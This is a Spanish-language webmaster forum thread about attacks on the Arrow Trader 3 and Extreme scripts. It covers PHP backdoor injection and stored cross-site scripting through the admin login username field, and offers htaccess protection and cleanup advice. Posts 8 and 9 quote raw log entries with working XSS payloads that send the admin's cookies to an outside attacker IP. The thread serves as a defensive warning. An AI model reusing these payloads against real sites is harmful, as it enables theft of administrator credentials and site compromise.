training rosa
Grupo SEO TELEGRAM [Click Aquí]
Resultados 1 al 9 de 9
Tema:

Fallo de seguridad en Arrow Trader 3 y extreme

  1. #1
    elmister está desconectado Registrado

    User Info Menu

    Predeterminado Fallo de seguridad en Arrow Trader 3 y extreme

    En las ultimas semanas se estan produciendo ataques a los scripts Arrow Trader 3 y Arrow Trader Extreme (tambien conocidos como AT3 y ATX)

    Basicamente hay 2 tipos de ataque, uno de ellos esta siendo protagonizado por un estonio que ataca desde la ip 92.62.101.9, usando un exploit para el at3/atx consigue inyectar un script php en el servidor (generalmente lo llama check.php, sync.php o algo parecido) a traves del cual ejecuta un script perl que MODIFICA vuestras webs añadiendo un javascript malicioso (virus) a las webs.

    El otro ataque consiste en intentar loguearse al admin con un nombre de usuario manipulado, algo tal como "<script>codigomalicioso</script>" como nombre de usuario, el intento de acceso queda registrado en el Security log mostrando el nombre de usuario, el efecto real es que el webmaster carga el security log y termina ejecutando (sin saberlo) ese javascript malicioso, en este caso el javascript envia el contenido de las cookies de tu dominio a manos del atacante, las cookies del at3/atx contienen el password del admin

    Como protegernos?
    Si ya hemos sido atacados tendremos que revisar los ficheros de las webs buscando el codigo malicioso y eliminarlo, puedes cientos o miles los ficheros modificados, una herramienta de buscar-reemplazar es muy util.
    Ademas, el estonio introduce varios scripts en el servidor, hay que localizar todos y eliminarlos, o seguira teniendo una puerta abierta para entrar cuando le plazca.

    Respecto al segundo ataque, lo mejor es proteger con un htaccess los accesos al admin.cgi y el subdirectorio x/, que contiene otros cgi de uso exclusivo del admin. No entres el Security Log o entregaras la clave al atacante, busca el fichero l/sys/sec.log y cambialo por un fichero vacio, si quieres ver el contenido bajatelo y abrelo con un editor de textos, pero no lo cargues en un navegador.

    Para proteger el admin.cgi y el directorio x/ usa estos .htaccess (cambia las rutas de directorios)

    para el admin.cgi, copia este fichero en el directorio donde esta el admin.cgi
    <FilesMatch "admin.cgi">
    AuthUserFile /home/usuario/.htpasswd
    AuthGroupFile /dev/null
    AuthName EnterPassword
    AuthType Basic

    require valid-user
    </FilesMatch>
    y este otro en el subdirectorio x/
    AuthUserFile /home/usuario/.htpasswd
    AuthGroupFile /dev/null
    AuthName EnterPassword
    AuthType Basic

    require valid-user
    Ademas necesitas un fichero .htpasswd, que contendra el usuario y password en una sola linea, podeis generarlo con este generador http://home.flash.net/cgi-bin/pw.pl


    Protejete antes de que te ataquen, si ya te han atacado tendras varias horas de trabajo para localizar todo lo modificado y eliminar los ficheros 'extra' que te hayan metido.

    En alguna parte me hubiera gustado extenderme mas, pero haria el post muy largo, si teneis preguntas mejor dejadlas aca.

  2. #2
    elmister está desconectado Registrado

    User Info Menu

    Predeterminado

    En todos los casos es necesario ACTUALIZAR a la ultima version el AT3/ATX y recomendable poner los .htaccess que pongo al final, ya que nos protegen contra ambos ataques.

  3. #3
    Avatar de xavierx
    xavierx está desconectado Registrado

    User Info Menu

    Predeterminado

    Gracias mister por la alerta.
    www.forodewebmasters.com
    El foro más profesional del mercado adulto.
    Con 100 post te ganas una taza para café como esta

  4. #4
    gomin Invitado

    Predeterminado

    Gracias mister por el aviso!

    Revisando los logs de un par de sitios con at3 encontré varios intentos de inyección de código. La lista de ips en mis logs es:

    92.62.101.9 (Estonia)
    195.5.116.250 (Estonia)
    200.63.46.23 (Panamá)
    203.117.111.106 (Singapur)

    El intento desde Panamá es del 23 de Julio y pretende inyectar un código 'i.php' hosteado en 92.62.101.9



  5. #5
    elmister está desconectado Registrado

    User Info Menu

    Predeterminado

    Cita Iniciado por gomin Ver Mensaje
    Gracias mister por el aviso!

    Revisando los logs de un par de sitios con at3 encontré varios intentos de inyección de código. La lista de ips en mis logs es:

    92.62.101.9 (Estonia)
    195.5.116.250 (Estonia)
    200.63.46.23 (Panamá)
    203.117.111.106 (Singapur)

    El intento desde Panamá es del 23 de Julio y pretende inyectar un código 'i.php' hosteado en 92.62.101.9


    Hace algo asi como en este ejemplo sacado de otro afectado



    <tr class=row2><td style="white-space: nowrap;">09:53 - 20 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with
    *un iframe* 'src=http://92.62.101.9/i.php> / */iframe*</td></tr>

    o que cargue una imagen, donde la imagen es un i.php de su servidor, y enviadose a si mismo las cookies

    Si lo has visto en tu navegador en el Security log, resetea ese log e inmediatamente despues cambia la clave

  6. #6
    elmister está desconectado Registrado

    User Info Menu

    Predeterminado

    Me preguntan en privado por el codigo del htaccess, culpa mia, no lo he aclarado bien

    Del codigo del .htaccess teneis que cambiar esta linea

    AuthUserFile /home/usuario/.htpasswd
    en ella debe poner el path completo al fichero .htpasswd, el cual contendra los usuarios y claves, ese fichero lo generais con un editor de texto, poniendo las lineas que os de el generador de claves.

    El usuario y password que usareis ahi no sera el del at3 ni el de la cuenta, sera otro diferente de vuestra eleccion que servira para proteger doblemente el acceso al at3

  7. #7
    gomin Invitado

    Predeterminado

    Cita Iniciado por elmister Ver Mensaje
    Si lo has visto en tu navegador en el Security log, resetea ese log e inmediatamente despues cambia la clave
    Gracias a tu aviso, los logs fueron bajados por ftp, leídos con el notepad y borrados del servidor.
    Por precaución, se han revisado los sitios y no aparace ninguna página infectada.

  8. #8
    ody
    ody está desconectado Registrado
    Rango: Mente de negocios

    User Info Menu

    Predeterminado

    Infectadísimo:

    Código:
    92.62.101.9 tried to login with user<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%32%20%68%65%69%67%68%74%3D%32%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%75%6E%69%73%74%61%66%66%2E%72%75%2F%6A%73%2F%73%61%76%65%72%2E%70%68%74%6D%6C%3F%6C%6F%67%69%6E%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%68%6F%6E%65%79%31%38%74%65%65%6E%73%2E%63%6F%6D%2F%63%67%69%2D%62%69%6E%2F%61%74%33%2F%69%6E%2E%63%67%69%3D')+document.cookie+unescape('%22%3E%3C%2F%69%66%72%61%6D%65%3E'))</script> / pass.
    Código:
    200.63.46.23 tried to login with 
    <iframe width=1 height=1 a=" / " b='.
    Código:
    200.63.46.23 tried to login with 
    'src=http://92.62.101.9/i.php> / </iframe>.
    Código:
    92.62.101.9 tried to login with 
    <script>/*<!--*/s="http";a=" / ";s+="://92.62.101.9/u/s.";b='.
    Código:
    92.62.101.9 tried to login with 
    ';s+="php?";a=" / ";s+=document.cookie;b='.

    Código:
    92.62.101.9 tried to login with 
    ';s+="php?";a=" / ";s+=document.cookie;b='.
    Código:
    92.62.101.9 tried to login with 
    ';i=new Image();i.src=s;a=" / ";//--></script>.

  9. #9
    elmister está desconectado Registrado

    User Info Menu

    Predeterminado

    Cita Iniciado por ody Ver Mensaje
    Infectadísimo:

    Código:
    92.62.101.9 tried to login with user<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%32%20%68%65%69%67%68%74%3D%32%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%75%6E%69%73%74%61%66%66%2E%72%75%2F%6A%73%2F%73%61%76%65%72%2E%70%68%74%6D%6C%3F%6C%6F%67%69%6E%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%68%6F%6E%65%79%31%38%74%65%65%6E%73%2E%63%6F%6D%2F%63%67%69%2D%62%69%6E%2F%61%74%33%2F%69%6E%2E%63%67%69%3D')+document.cookie+unescape('%22%3E%3C%2F%69%66%72%61%6D%65%3E'))</script> / pass.
    Código:
    200.63.46.23 tried to login with 
    <iframe width=1 height=1 a=" / " b='.
    Código:
    200.63.46.23 tried to login with 
    'src=http://92.62.101.9/i.php> / </iframe>.
    Código:
    92.62.101.9 tried to login with 
    <script>/*<!--*/s="http";a=" / ";s+="://92.62.101.9/u/s.";b='.
    Código:
    92.62.101.9 tried to login with 
    ';s+="php?";a=" / ";s+=document.cookie;b='.
    Código:
    92.62.101.9 tried to login with 
    ';s+="php?";a=" / ";s+=document.cookie;b='.
    Código:
    92.62.101.9 tried to login with 
    ';i=new Image();i.src=s;a=" / ";//--></script>.
    92.62.101.9 es la ip del estonio, si ha intentado eso habra intentado tambien inyectar codigo a traves del login.cgi y quiza ya lo tengas en el servidor, busca ficheros php que tu no hayas subido ahi, tipicamente los llama check.php, backup.php, sync.php y tambien los llama de la misma forma que el directorio donde lo mete

    es decir, si lo mete en el directorio xyzt/, el fichero lo llama xyzt/xyzt.php
    y contiene codigo php ofuscado, es una "puerta trasera" para ejecutar lo que quiera.

Temas Similares

  1. Quien utiliza el Arrow Trader Lite?
    Por ody en el foro Webmasters Porno
    Respuestas: 2
    Último Mensaje: 22/02/2008, 18:18
  2. Usuarios de Arrow Trader Lite
    Por gomin en el foro Webmasters Porno
    Respuestas: 1
    Último Mensaje: 09/12/2007, 19:38
  3. Exploit en Arrow Trader
    Por Vodka en el foro Webmasters Porno
    Respuestas: 4
    Último Mensaje: 17/01/2007, 05:49
  4. Ayuda con Arrow Trader
    Por arielhc en el foro General SoyWebmaster
    Respuestas: 0
    Último Mensaje: 15/01/2006, 22:07
  5. Grave fallo de seguridad en PHP
    Por marqueze en el foro Webmasters Porno
    Respuestas: 2
    Último Mensaje: 06/04/2005, 13:28

Permisos de Publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •  
Has visto el post " Fallo de seguridad en Arrow Trader 3 y extreme" que está en esta URL y ha sido creado por el usuario elmister. Esperamos que te haya sido de utilidad el artículo " Fallo de seguridad en Arrow Trader 3 y extreme" que inició el usuario elmister de Soywebmaster.com.

Otros Foros de Interés

Curso SEO - Foro SEO - Foro Programacion - Foro Diseño Web - Intercambio de Enlaces - Negocios por Internet - Como Ganar Dinero - Foro Hosting - Foro Apuestas Deportivas

ÚLTIMOS ARTÍCULOS DEL BLOG SEO DE DAVID AYALA

MÉTODOS EFICACES para Indexar Enlaces en Google
Webinar: Keyword Research (Con Emilio García)
Safecont: Una herramienta SEO diferente
MEGA GUÍA SEO AutoPilot (Link Building Automático)
Usamos cookies que analizan hábitos de comportamiento y navegación que aceptas al navegar aquí. Política de privacidad | Cookies | Aviso legal